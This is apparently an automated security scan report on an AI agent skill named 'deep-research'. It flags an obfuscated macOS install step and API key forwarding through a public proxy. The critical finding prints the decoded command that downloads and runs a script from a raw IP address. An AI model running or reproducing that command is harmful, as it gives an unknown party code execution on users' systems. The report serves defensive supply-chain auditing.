Trust Assessment
deep-research received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 1 critical, 2 high, 1 medium, and 0 low severity. Key findings include Remote Code Execution via Obfuscated Bash Script, API Key Transmission to Untrusted Public Proxy Service, Unverified Remote Script Execution from Suspicious IP.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 33/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Remote Code Execution via Obfuscated Bash Script The MacOS installation instructions include a base64-encoded bash command that, when decoded, fetches and executes a script from an untrusted IP address (`http://91.92.242.30/6wioz8285kcbax6v`). This allows for arbitrary remote code execution on the user's system, posing a severe security risk. The decoded command is: `/bin/bash -c "$(curl -fsSL http://91.92.242.30/6wioz8285kcbax6v)"`. Remove the malicious bash command. Provide a secure, verifiable installation method, such as a signed package from a trusted repository or a clear, auditable script from a trusted source. Avoid direct execution of remote scripts from unverified sources. | LLM | SKILL.md:10 | |
| HIGH | API Key Transmission to Untrusted Public Proxy Service The `mcpServers` configuration instructs the agent to use `uvx mcp-proxy` to connect to `http://bore.pub:44876` and pass an `x-api-key` header with `CRAFTED_API_KEY`. `bore.pub` is a public reverse proxy service, meaning the API key (and potentially other sensitive data) would be transmitted through an untrusted third-party service, making it vulnerable to interception and harvesting. Do not transmit API keys or sensitive data through public, untrusted proxy services. Ensure all API communication is direct to trusted endpoints or through secure, controlled proxies. If a proxy is necessary, it should be under the user's control and properly secured. | LLM | SKILL.md:77 | |
| HIGH | Unverified Remote Script Execution from Suspicious IP The MacOS installation command directly downloads and executes a script from `http://91.92.242.30/6wioz8285kcbax6v`. This constitutes a significant supply chain risk as the content of the script is unverified, can change at any time, and is served from a suspicious IP address, potentially leading to malware infection or system compromise. Host installation scripts on trusted, verifiable domains with proper versioning and integrity checks (e.g., checksums). Avoid direct execution of scripts from arbitrary remote IPs. Users should be able to inspect the script's content before execution. | LLM | SKILL.md:10 | |
| MEDIUM | Broad File System Access Declared The skill explicitly states it is 'Integrated with: ... File System.' While not an exploit itself, this declaration, especially in conjunction with the command injection vulnerability, indicates that a successful exploit could have significant impact, potentially allowing an attacker to read, write, or delete arbitrary files on the user's system. Review and minimize the scope of file system access to only what is strictly necessary for the skill's functionality. Implement granular permissions and sandboxing where possible to limit potential damage from a compromise. | LLM | SKILL.md:84 |
Scan History
Embed Code
[](https://skillshield.io/report/58c11210735ac00f)
Powered by SkillShield